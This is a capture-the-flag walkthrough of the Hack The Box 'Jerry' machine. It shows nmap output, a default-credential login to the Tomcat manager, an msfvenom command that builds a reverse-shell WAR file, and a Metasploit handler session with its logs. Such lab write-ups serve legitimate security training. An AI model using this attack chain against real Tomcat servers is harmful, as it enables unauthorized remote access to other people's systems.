This is the fourth part of the Hack The Box Beginner Track: “Jerry”.
nmap reveals only one open port, which is Tomcat 7.0.88 on port 8080:
PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: |_ Supported Methods: GET POST OPTIONS |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88
The box is tagged “Default Credentials”, so let’s see if this helps us here. The tomcat login page opens at
/manager/html. After entering a wrong password, we get a “403 - Access Denied” notification with a sample code how to implement the user. It lists a password and username.
Now, if we log in again (you need to clear the cache or use a private window), we are in!
Googling for “Tomcat 7.0.88 exploit”, we get a couple of hits regarding remote code execution via JSP upload. Let’s see if Metasploit has something prepared:
Unfortunately both exploit 7 and exploit 25 fail, so we might need to find a more manual approach.
Let’s create a WAR-file with msfvenom:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.74 -f war -o backupjob.war LPORT=4444
A war file is a file which distributes JAR-files and other resources. We can check the contents with
jar -ft backupjob.war:
$ jar -ft backupjob.war Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true META-INF/ META-INF/MANIFEST.MF WEB-INF/ WEB-INF/web.xml maviljcffocdph.jsp
This means, the file that we actually need to get executed is
maviljcffocdph.jsp. In order to do that, we simply need to call it (for example via curl, or the browser), using the URL given in the applications-list.
In parallel, of course we need to have the listener ready in metasploit (
use multi/handler). Now we simply call the jsp-file and we get a shell.
msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.74:4444 [*] Sending stage (175686 bytes) to 10.129.75.105 [*] Meterpreter session 1 opened (10.10.14.74:4444 -> 10.129.75.105:49192) at 2022-10-28 11:58:31 -0400 meterpreter > shell Process 2872 created. Channel 1 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>id id 'id' is not recognized as an internal or external command, operable program or batch file. C:\apache-tomcat-7.0.88>
In the desktop folder of the administrator user, we can find both flags.